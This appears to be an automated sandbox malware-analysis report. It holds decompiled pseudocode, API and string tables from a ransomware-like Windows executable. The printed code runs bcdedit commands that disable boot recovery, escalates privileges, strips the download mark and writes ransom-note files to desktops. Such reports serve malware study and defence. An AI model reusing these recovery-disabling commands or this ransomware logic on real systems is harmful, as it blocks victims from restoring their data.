											_t166 = GetLastError();
											__eflags = _t166 - 0xb7;
											if(_t166 != 0xb7) {
												E0042D0A0(0x441738, 0, 0x11c);
												0x441738->dwOSVersionInfoSize = 0x11c;
												GetVersionExW(0x441738);
												E00401480(1, _t300, __eflags);
												E0041FD80(1, _t300, _t305);
												_v260 = 0;
												CreateThread(0, 0, E0041EA20, 0, 0,  &_v260);
												E0041EF90("bcdedit.exe /set {current} bootems off");
												E0041EF90("bcdedit.exe /set {current} advancedoptions off");
												E0041EF90("bcdedit.exe /set {current} optionsedit off");
												E0041EF90("bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures");
												E0041EF90("bcdedit.exe /set {current} recoveryenabled off");
												E0041EC00(_t300, __eflags);
												_push(0x441d28);
												_push(0x441d28);
												_t255 =  *0x462894; // 0x0
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												E004206D0(0x3a98, 0x462918, _t255, 0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_t282 =  *0x4665a4; // 0x0
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												_push(0x441d28);
												E004206D0(0x3a98, 0x4665a8, _t282, 0x441d28);
												_a60 = 0;
												E0042D0A0( &_a61, 0, 0x1df);
												_t329 = _t321 + 0xd8;
												_t256 =  &_a60;
												_t308 = 0x441d88;
												do {
													_t183 =  *_t308 & 0x000000ff;
													_t78 =  &(("0123456789ABCDEF")[_t183 >> 4]); // 0x33323130
													_t286 =  *_t78;
													_t79 =  &(("0123456789ABCDEF")[_t183 & 0x0000000f]); // 0x33323130
													 *_t256 =  *_t78;
													 *((char*)(_t256 + 1)) =  *_t79;
													_t308 =  &(_t308[1]);
													_t256 = _t256 + 2;
													__eflags = _t308 - 0x441de9;
												} while (_t308 != 0x441de9);
												 *_t256 = 0;
												_t186 = E00426466( &_v272, "C:\Users\admin\Documents\recover_file_yddmbpomp.txt", L"w+");
												_t330 = _t329 + 0xc;
												__eflags = _t186;
												if(__eflags == 0) {
													_t292 =  *0x462860; // 0x5e
													_push(_t292);
													_push(0x441d28);
													_push( &_a60);
													_push(0x441d58);
													_push("%s\n%s\n%S\n%d\n");
													_push(_v272);
													E004264B8(1, _t300, _t308, __eflags);
													_t286 = _v272;
													_push(_v272);
													_t186 = E00426631(1, _t300, _t308, __eflags);
													_t330 = _t330 + 0x1c;
												}
												E00423440(_t186);
												_t301 = 0;
												__eflags =  *0x441d1c - 1; // 0x0
												if(__eflags == 0) {
													 *0x462864 = 0;
													_t213 = E00420700(E0041B480);
													_t330 = _t330 + 4;
													_t301 = _t213;
												}
												 *0x46a234 = 1;
												E00420700(E0041FF20);
												_t309 = E00420700(E00413840);
												SetThreadPriority(_t309, 0xfffffff1);
												_t191 = E00413000(_t286, 0, 1, 0xc54374f3);
												 *_t191(_t309, 0xffffffff);
												__eflags = 0;
												_a532 = 0;
												E0042D0A0( &_a534, 0, 0x1ffe);
												E00414300(0x1000,  &_a532, L"%s\\help_recover_instructions.TXT", "C:\Users\admin\Desktop");
												E0041F910( &_a532,  &_a534);
												E00420730( &_a532);
												_push(L".HTM");
												E00414300(0x1000,  &_a532, L"%s\\help_recover_instructions%s", "C:\Users\admin\Desktop");
												E0041F970( &_a532,  &_a532);
												E00420730( &_a532);
												E00414300(0x1000,  &_a532, L"%s\\help_recover_instructions.BMP", "C:\Users\admin\Desktop");
												E00420350( &_a532);
												_t276 =  &_a532;
												E00420730( &_a532);
												E00420700(E0041EA20);
												E00420840( &_a532, _t301, 0x2bf20);
												 *0x462864 = 1;
												E00420840( &_a532, E00420700(E0041B480), 0xea60);
												_t315 = _t330 + 0x70;
												E0041FC50(1, _t276, _t301, _t309, __eflags);
												goto L50;
											} else {
												_pop(_t302);
												_pop(_t310);
												_pop(_t236);
												__eflags = _a8740 ^ _t321;
												return E004256FE(1, _t236, _a8740 ^ _t321, _t277, _t302, _t310);
											}
										}
									}
								}
							}
						}
					}
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L15;
			}

0x0041f045
0x0041f04d
0x0041f052
0x0041f059
0x0041f063
0x0041f086
0x0041f08a
0x0041f091
0x0041f09b
0x0041f0a1
0x0041f0a7
0x0041f0a9
0x0041f0b4
0x0041f0bc
0x0041f0be
0x0041f0be
0x0041f0c7
0x0041f0cd
0x0041f0cd
0x0041f0d1
0x0041f0e1
0x0041f0e6
0x0041f0ea
0x0041f0f1
0x0041f0f8
0x0041f0ff
0x0041f106
0x0041f11a
0x0041f122
0x0041f127
0x0041f12d
0x0041f144
0x0041f148
0x0041f14c
0x0041f153
0x0041f15a
0x0041f161
0x0041f168
0x0041f16a
0x0041f17a
0x0041f17b
0x0041f17c
0x0041f184
0x0041f188
0x0041f188
0x0041f1a0
0x0041f1a2
0x0041f1b9
0x0041f1bb
0x0041f1d2
0x0041f1d4
0x0041f1da
0x0041f1de
0x0041f1de
0x0041f1f1
0x0041f1f6
0x0041f1fb
0x0041f202
0x0041f210
0x0041f212
0x0041f216
0x0041f220
0x0041f220
0x0041f226
0x00000000
0x00000000
0x0041f22b
0x0041f242
0x0041f242
0x0041f22d
0x0041f22d
0x0041f235
0x00000000
0x0041f237
0x0041f237
0x0041f23a
0x0041f240
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f240
0x0041f235
0x0041f24b
0x0041f24d
0x0041f8f5
0x0041f8fc
0x0041f8fd
0x0041f8fe
0x0041f901
0x0041f90b
0x0041f264
0x0041f264
0x0041f26a
0x0041f26e
0x0041f26f
0x0041f277
0x0041f4ac
0x0041f4b1
0x0041f4b2
0x0041f4b3
0x0041f4c5
0x0041f287
0x0041f287
0x0041f299
0x0041f2a2
0x0041f2a6
0x0041f2a6
0x0041f2ab
0x0041f2af
0x0041f2b5
0x0041f2b9
0x0041f2b9
0x0041f2c4
0x0041f2c5
0x0041f2cd
0x0041f2d1
0x0041f2d1
0x0041f2d6
0x0041f2da
0x0041f2dc
0x0041f2df
0x0041f2e4
0x0041f2e8
0x0041f2e8
0x0041f308
0x0041f310
0x0041f322
0x0041f329
0x0041f32f
0x0041f335
0x0041f345
0x0041f34a
0x0041f359
0x0041f35e
0x0041f36d
0x0041f37c
0x0041f389
0x0041f39e
0x0041f3b8
0x0041f3cf
0x0041f3e4
0x0041f3f3
0x0041f402
0x0041f410
0x0041f425
0x0041f43c
0x0041f441
0x0041f449
0x0041f44f
0x0041f463
0x0041f468
0x0041f470
0x0041f472
0x0041f479
0x0041f479
0x0041f47e
0x0041f483
0x0041f488
0x0041f48d
0x0041f4fb
0x0041f500
0x0041f502
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f48f
0x0041f48f
0x0041f493
0x0041f498
0x0041f4c8
0x0041f4cd
0x00000000
0x0041f4cf
0x0041f4cf
0x0041f4d4
0x00000000
0x00000000
0x00000000
0x00000000
0x0041f4d4
0x0041f49a
0x0041f49a
0x0041f4d6
0x0041f4d6
0x0041f4db
0x0041f4dd
0x00000000
0x0041f4df
0x0041f4e4
0x0041f4e5
0x0041f4e6
0x0041f4ee
0x0041f4f8
0x0041f4f8
0x0041f49c
0x0041f49e
0x0041f4a7
0x00000000
0x0041f504
0x0041f504
0x0041f511
0x0041f516
0x0041f522
0x0041f524
0x0041f52a
0x0041f52f
0x0041f556
0x0041f563
0x0041f56d
0x0041f573
0x0041f578
0x0041f58f
0x0041f597
0x0041f5a2
0x0041f5af
0x0041f5bc
0x0041f5c9
0x0041f5d6
0x0041f5de
0x0041f5e3
0x0041f5e8
0x0041f5ed
0x0041f5f3
0x0041f5f8
0x0041f5fd
0x0041f602
0x0041f607
0x0041f60c
0x0041f611
0x0041f616
0x0041f61b
0x0041f620
0x0041f635
0x0041f63d
0x0041f642
0x0041f647
0x0041f64c
0x0041f651
0x0041f656
0x0041f65b
0x0041f660
0x0041f665
0x0041f66a
0x0041f66f
0x0041f674
0x0041f679
0x0041f67e
0x0041f683
0x0041f688
0x0041f68e
0x0041f693
0x0041f698
0x0041f69d
0x0041f6a2
0x0041f6a7
0x0041f6ac
0x0041f6b1
0x0041f6b6
0x0041f6bb
0x0041f6d0
0x0041f6e4
0x0041f6ec
0x0041f6f1
0x0041f6f4
0x0041f6fb
0x0041f700
0x0041f700
0x0041f708
0x0041f708
0x0041f711
0x0041f717
0x0041f719
0x0041f71c
0x0041f71e
0x0041f721
0x0041f721
0x0041f72e
0x0041f73b
0x0041f740
0x0041f743
0x0041f745
0x0041f747
0x0041f751
0x0041f752
0x0041f75e
0x0041f75f
0x0041f764
0x0041f769
0x0041f76a
0x0041f76f
0x0041f773
0x0041f774
0x0041f779
0x0041f779
0x0041f77c
0x0041f781
0x0041f783
0x0041f789
0x0041f790
0x0041f796
0x0041f79b
0x0041f79e
0x0041f79e
0x0041f7a5
0x0041f7ab
0x0041f7c0
0x0041f7c5
0x0041f7d3
0x0041f7de
0x0041f7e0
0x0041f7f0
0x0041f7f8
0x0041f817
0x0041f826
0x0041f833
0x0041f83b
0x0041f857
0x0041f863
0x0041f870
0x0041f88f
0x0041f89f
0x0041f8a4
0x0041f8af
0x0041f8bc
0x0041f8ca
0x0041f8d4
0x0041f8e8
0x0041f8ed
0x0041f8f0
0x00000000
0x0041f531
0x0041f533
0x0041f534
0x0041f535
0x0041f53d
0x0041f547
0x0041f547
0x0041f52f
0x0041f49e
0x0041f49a
0x0041f498
0x0041f48d
0x0041f277
0x0041f24d
0x0041f246
0x0041f248
0x00000000

APIs

AllocateAndInitializeSid.ADVAPI32 ref: 0041F09B
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0041F0B4
FreeSid.ADVAPI32(?), ref: 0041F0C7
SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 0041F0E6

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

CoCreateInstance.OLE32(0043B924,00000000,00000001,004312C8,?), ref: 0041F168
ExitProcess.KERNEL32 ref: 0041F188
CoCreateInstance.OLE32(0043B934,00000000,00000001,004312B8,?), ref: 0041F1A0
ExitProcess.KERNEL32 ref: 0041F1DE
LoadLibraryW.KERNEL32(Shell32.dll), ref: 0041F2F2
LoadStringW.USER32(00000000,00005509,Desktop,000000FF), ref: 0041F310
LoadStringW.USER32(00000000,00005527,Public Desktop,000000FF), ref: 0041F322
GetModuleHandleW.KERNEL32(KERNEL32), ref: 0041F329
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0041F33D
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 0041F34A
SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,C:\Windows), ref: 0041F35E
SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,C:\Program Files), ref: 0041F36D
SHGetFolderPathW.SHELL32(00000000,0000003B,00000000,00000000,C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn), ref: 0041F37C
SHGetSpecialFolderPathW.SHELL32(00000000,C:\Users\admin\Documents\recover_file_yddmbpomp.txt,00000005,00000000), ref: 0041F389
SHGetFolderPathW.SHELL32(00000000,00000010,00000000,00000000,C:\Users\admin\Desktop), ref: 0041F3E4
SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,C:\Users\Public\Desktop), ref: 0041F3F3
SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,C:\ProgramData), ref: 0041F402
GetModuleFileNameW.KERNEL32(00000000,C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe,00001000), ref: 0041F410
DeleteFileW.KERNELBASE(C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe:Zone.Identifier), ref: 0041F449

Part of subcall function 00420160: CreateFileW.KERNEL32(C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00420184
Part of subcall function 00420160: SetFilePointer.KERNELBASE(00000000,0000003C,00000000,00000000,00000000,7600CD44), ref: 004201A0
Part of subcall function 00420160: ReadFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 004201B5
Part of subcall function 00420160: SetFilePointer.KERNELBASE(00000000,-00000058,00000000,00000000), ref: 004201C4
Part of subcall function 00420160: ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004201D3
Part of subcall function 00420160: CloseHandle.KERNEL32(00000000), ref: 004201D6

LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 0041F468

Part of subcall function 0041F9D0: SetLastError.KERNEL32(00000057,76F85660,?,0041F488,?), ref: 0041F9EF
Part of subcall function 0041F9D0: GetCurrentProcess.KERNEL32(00000008,0041F488,00000000,76F85660,?,0041F488,?), ref: 0041FA03
Part of subcall function 0041F9D0: OpenProcessToken.ADVAPI32(00000000,?,0041F488,?), ref: 0041FA0A
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA14
Part of subcall function 0041F9D0: GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,00000000,?,7600CD44,?,0041F488,?), ref: 0041FA32
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA3E
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA45
Part of subcall function 0041F9D0: LocalAlloc.KERNEL32(00000040,?,?,0041F488,?), ref: 0041FA52
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA5E
Part of subcall function 0041F9D0: GetTokenInformation.KERNELBASE(0041F488,00000019,00000000,?,?,?,0041F488,?), ref: 0041FA74
Part of subcall function 0041F9D0: GetLastError.KERNEL32(?,0041F488,?), ref: 0041FA7A
Part of subcall function 0041F9D0: GetSidSubAuthority.ADVAPI32(?,00000000,?,0041F488,?), ref: 0041FA86
Part of subcall function 0041F9D0: CloseHandle.KERNEL32(0041F488), ref: 0041FA9E
Part of subcall function 0041F9D0: LocalFree.KERNEL32 ref: 0041FAAC
Part of subcall function 0041F9D0: SetLastError.KERNEL32(?,?,0041F488,?), ref: 0041FABF

Part of subcall function 0041E880: GetEnvironmentVariableW.KERNEL32(windir,?,00000208), ref: 0041E8E2
Part of subcall function 0041E880: ShellExecuteExW.SHELL32(?), ref: 0041E9C6
Part of subcall function 0041E880: GetLastError.KERNEL32 ref: 0041E9E0
Part of subcall function 0041E880: Sleep.KERNEL32(000003E8), ref: 0041E9EE
Part of subcall function 0041E880: ShellExecuteExW.SHELL32(0000003C), ref: 0041E9F7
Part of subcall function 0041E880: CloseHandle.KERNEL32(?), ref: 0041EA06

Part of subcall function 004201F0: GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041F47E), ref: 0042020B
Part of subcall function 004201F0: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041F47E), ref: 00420212
Part of subcall function 004201F0: AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00420253
Part of subcall function 004201F0: CloseHandle.KERNEL32(?), ref: 0042025D

Part of subcall function 0041FAE0: PathFindFileNameW.SHLWAPI(C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe), ref: 0041FB29
Part of subcall function 0041FAE0: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041FB64
Part of subcall function 0041FAE0: GetLastError.KERNEL32(?,?,?,?,?,00000000,76F85660,?,0041F500), ref: 0041FB6C
Part of subcall function 0041FAE0: CloseHandle.KERNEL32(00000000), ref: 0041FB75
Part of subcall function 0041FAE0: CopyFileW.KERNEL32(C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe,?,00000000), ref: 0041FBC0
Part of subcall function 0041FAE0: CreateProcessW.KERNEL32 ref: 0041FC14

GetLastError.KERNEL32 ref: 0041F524
GetVersionExW.KERNEL32(00441738), ref: 0041F56D

Part of subcall function 0041FD80: RegCreateKeyExA.ADVAPI32 ref: 0041FDE1
Part of subcall function 0041FD80: RegSetValueExW.ADVAPI32(?,EnableLinkedConnections,00000000,00000004,00000001,00000004), ref: 0041FE00
Part of subcall function 0041FD80: RegFlushKey.ADVAPI32(?), ref: 0041FE0D
Part of subcall function 0041FD80: RegCloseKey.ADVAPI32(?), ref: 0041FE1A

CreateThread.KERNEL32 ref: 0041F597

Part of subcall function 0041EF90: WaitForSingleObject.KERNEL32(?,00007530), ref: 0041F005
Part of subcall function 0041EF90: CloseHandle.KERNEL32(?), ref: 0041F015
Part of subcall function 0041EF90: CloseHandle.KERNEL32(?), ref: 0041F01B
Part of subcall function 0041EF90: Sleep.KERNEL32(000003E8), ref: 0041F022

SetThreadPriority.KERNEL32(00000000,000000F1,?,?,?,?,?,?,00000000,000001DF,004665A8,00000000,00441D28,00441D28,00441D28,00441D28), ref: 0041F7C5

Part of subcall function 0041F910: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F931
Part of subcall function 0041F910: WriteFile.KERNEL32(00000000,00462918,00462919,00000000,00000000), ref: 0041F95C
Part of subcall function 0041F910: CloseHandle.KERNEL32(00000000), ref: 0041F963

Part of subcall function 0041F970: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0041F991
Part of subcall function 0041F970: WriteFile.KERNEL32(00000000,004665A8,004665A9,00000000,00000000), ref: 0041F9BC
Part of subcall function 0041F970: CloseHandle.KERNEL32(00000000), ref: 0041F9C3

Part of subcall function 00420350: GetDC.USER32(00000000), ref: 004203EB
Part of subcall function 00420350: GetDIBits.GDI32(00000000,?,00000000,?,00000000,?,00000000), ref: 0042041C
Part of subcall function 00420350: ReleaseDC.USER32(00000000,00000000), ref: 00420425
Part of subcall function 00420350: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 0042045E
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,?,0000000E,00000000,00000000), ref: 00420478
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,00000028,00000028,00000000,00000000), ref: 00420492
Part of subcall function 00420350: WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004204A8
Part of subcall function 00420350: FlushFileBuffers.KERNEL32(00000000), ref: 004204AF
Part of subcall function 00420350: CloseHandle.KERNEL32(00000000), ref: 004204B6
Part of subcall function 00420350: DeleteObject.GDI32(?), ref: 004204C9

Part of subcall function 0041FC50: GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

bcdedit.exe /set {current} optionsedit off, xrefs: 0041F5B7
%s\help_recover_instructions.TXT, xrefs: 0041F80C
C:\Users\admin\Desktop, xrefs: 0041F3D7, 0041F800, 0041F840, 0041F878
SeDebugPrivilege, xrefs: 0041F45C
C:\Program Files, xrefs: 0041F360
.HTM, xrefs: 0041F83B
bcdedit.exe /set {current} advancedoptions off, xrefs: 0041F5AA
Public Desktop, xrefs: 0041F317
C:\Users\admin\Documents\recover_file_yddmbpomp.txt, xrefs: 0041F382, 0041F399, 0041F3B3, 0041F3CA, 0041F735
\recover_file_, xrefs: 0041F38F
Desktop, xrefs: 0041F303
%s\help_recover_instructions.BMP, xrefs: 0041F884
C:\Users\admin\AppData\Roaming, xrefs: 0041F0D7
bcdedit.exe /set {current} bootems off, xrefs: 0041F59D
C:\ProgramData, xrefs: 0041F3F5
Wow64RevertWow64FsRedirection, xrefs: 0041F33F
C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe, xrefs: 0041F409, 0041F416
bcdedit.exe /set {current} recoveryenabled off, xrefs: 0041F5D1
.txt, xrefs: 0041F3C0
:Zone.Identifier, xrefs: 0041F42D
C:\Windows, xrefs: 0041F34C
KERNEL32, xrefs: 0041F324
Shell32.dll, xrefs: 0041F2ED
bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures, xrefs: 0041F5C4
%s\help_recover_instructions%s, xrefs: 0041F84C
Wow64DisableWow64FsRedirection, xrefs: 0041F337
C:\94-61f847bcb69d0fe86ad7a4ba3f057be5.exe:Zone.Identifier, xrefs: 0041F420, 0041F437, 0041F444
C:\Users\admin\AppData\Local\Microsoft\Windows\Burn\Burn, xrefs: 0041F36F
C:\Users\Public\Desktop, xrefs: 0041F3E6
12393578327533451, xrefs: 0041F519
%s%s%S%d, xrefs: 0041F764

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 001A0000, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 285

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,?,72D08B8C), ref: 001A018C
VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001A01FD
CreateActCtxA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 001A0306

Part of subcall function 001A05DB: LoadLibraryA.KERNEL32(?,?,00000000,?,?,?,001A0327,2B14D0EE,?), ref: 001A0607

Strings

a, xrefs: 001A02CB
, xrefs: 001A02D6

Memory Dump Source

Source File: 00000000.00000002.227253422.001A0000.00000040.sdmp, Offset: 001A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 004201F0, Relevance: 6.0, APIs: 4, Instructions: 46

C-Code - Quality: 89%

			E004201F0(intOrPtr __edx, intOrPtr __esi) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				signed int _t13;
				intOrPtr _t24;
				intOrPtr _t31;
				intOrPtr _t34;
				signed int _t36;

				_t31 = __edx;
				_t13 =  *0x43f054; // 0xd46ffb00
				_v8 = _t13 ^ _t36;
				if(OpenProcessToken(GetCurrentProcess(), 0x20028,  &_v28) != 0) {
					_v24.Privileges =  *((intOrPtr*)(__esi));
					_v24.PrivilegeCount = 1;
					_v16 =  *((intOrPtr*)(__esi + 4));
					_v12 = 2;
					AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0); // executed
					CloseHandle(_v28);
					return E004256FE(1, _t24, _v8 ^ _t36, _v28, _t34, __esi);
				} else {
					return E004256FE(_t17, _t24, _v8 ^ _t36, _t31, _t34, __esi);
				}
			}

0x004201f0
0x004201f8
0x004201ff
0x0042021a
0x00420239
0x00420242
0x00420249
0x0042024c
0x00420253
0x0042025d
0x00420275
0x0042021c
0x00420229
0x00420229

APIs

GetCurrentProcess.KERNEL32(00020028,?,?,?,?,?,?,0041F47E), ref: 0042020B
OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0041F47E), ref: 00420212
AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000000,00000000,00000000), ref: 00420253
CloseHandle.KERNEL32(?), ref: 0042025D

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0042C13E, Relevance: 1.5, APIs: 1, Instructions: 4

C-Code - Quality: 100%

			E0042C13E() {

				SetUnhandledExceptionFilter(E0042C0FC); // executed
				return 0;
			}

0x0042c143
0x0042c14b

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0002C0FC), ref: 0042C143

Memory Dump Source

Source File: 00000000.00000002.227365714.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_94-61f847bcb69d0fe86ad7a4ba3f057be5.jbxd

Function 0041F040, Relevance: 84.6, APIs: 28, Strings: 20, Instructions: 620

C-Code - Quality: 53%

			E0041F040(void* __eflags, long _a4, void* _a8, struct _LUID _a32, char _a60, char _a61, char _a116, intOrPtr _a184, intOrPtr _a188, long _a192, char _a196, char _a220, char _a240, char _a252, char _a284, long _a288, intOrPtr _a292, intOrPtr _a296, struct _SID_IDENTIFIER_AUTHORITY _a300, char _a304, intOrPtr _a306, intOrPtr _a310, intOrPtr _a314, intOrPtr _a318, short _a322, char _a532, char _a534, signed int _a8740, signed int _a8752, signed int _a8908, signed int _a8916, signed int _a9020) {
				void* _v4;
				long _v8;
				void* _v20;
				char _v24;
				intOrPtr* _v40;
				intOrPtr _v44;
				char _v62;
				char _v64;
				char _v72;
				char _v80;
				intOrPtr* _v84;
				char _v88;
				intOrPtr* _v100;
				char _v104;
				intOrPtr* _v108;
				intOrPtr* _v116;
				intOrPtr* _v124;
				intOrPtr* _v132;
				long _v260;
				char _v272;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t99;
				int _t103;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t117;
				intOrPtr* _t123;
				intOrPtr* _t127;
				intOrPtr* _t132;
				intOrPtr* _t135;
				intOrPtr* _t138;
				struct HINSTANCE__* _t143;
				_Unknown_base(*)()* _t145;
				intOrPtr _t160;
				int _t161;
				void* _t162;
				signed int _t163;
				intOrPtr* _t164;
				long _t166;
				signed int _t183;
				signed int _t186;
				intOrPtr* _t191;
				void* _t213;
				long _t218;
				signed int _t219;
				void* _t227;
				void* _t231;
				void* _t232;
				void* _t234;
				void* _t236;
				void* _t237;
				intOrPtr* _t245;
				intOrPtr _t253;
				intOrPtr _t255;
				char* _t256;
				intOrPtr _t282;
				intOrPtr _t292;
				intOrPtr* _t295;
				intOrPtr* _t296;
				void* _t297;
				void* _t298;
				struct HINSTANCE__* _t299;
				struct HINSTANCE__* _t300;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t306;
				void* _t307;
				signed char* _t308;
				void* _t309;
				void* _t310;
				void* _t311;
				signed int _t312;
				signed int _t313;
				void* _t314;
				signed int _t315;
				void* _t320;
				signed int _t321;
				void* _t329;
				void* _t330;
				void* _t363;

				_t313 = _t312 & 0xfffffff8;
				E0042E220(0x2344);
				_t99 =  *0x43f054; // 0xd46ffb00
				_a9020 = _t99 ^ _t313;
				E004205E0(); // executed
				_a4 = 0;
				_a300.Value = 0;
				_a304 = 0x500;
				_t103 = AllocateAndInitializeSid( &_a300, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_a8);
				_a4 = _t103;
				if(_t103 != 0) {
					_t227 = _a8;
					__imp__CheckTokenMembership(0, _t227,  &_a4);
					if(_t227 == 0) {
						_v8 = 0;
					}
					FreeSid(_v4);
					_t103 = _v8;
				}
				_t305 = __imp__SHGetFolderPathW;
				 *0x482238 = _t103; // executed
				 *_t305(0, 0x1a, 0, 0, "C:\Users\admin\AppData\Roaming"); // executed
				_a306 = 0;
				_a310 = 0;
				_a314 = 0;
				_a318 = 0;
				_a322 = 0;
				_a304 = 0;
				E004233D0( &_a304, 9);
				_t295 = __imp__CoCreateInstance; // 0x76de9d0b
				_t314 = _t313 + 8;
				_v20 = 0;
				_v24 = 0;
				_a288 = 0;
				_a292 = 0;
				_a296 = 0;
				_a300.Value = 0;
				 *_t295(0x43b924, 0, 1, 0x4312c8,  &_v20); // executed
				_t110 = _v40;
				_push( &_a284);
				_push(0);
				_push(_t110);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0xc))))() != 0x80004003) {
					ExitProcess(0xffffffff);
				}
				 *_t295(0x43b934, 0, 1, 0x4312b8,  &_v24); // executed
				_t114 = _v72;
				 *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0xc))))(_t114, _v44,  &_a252);
				_t117 = _v84;
				 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x18))))(_t117,  &_a240,  &_v88);
				_t296 = _v100;
				if(_t296 == 0) {
					ExitProcess(1);
				}
				_v64 = 0;
				E0042D0A0( &_v62, 0, 0xfe);
				_t315 = _t314 + 0xc;
				_a192 = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *_t296 + 0x30))))(_t296,  &_v64);
				_t245 =  &_v72;
				_t123 =  &_a220;
				while(1) {
					_t276 =  *_t123;
					if(_t276 !=  *_t245) {
						break;
					}
					if(_t276 == 0) {
						L13:
						_t123 = 0;
					} else {
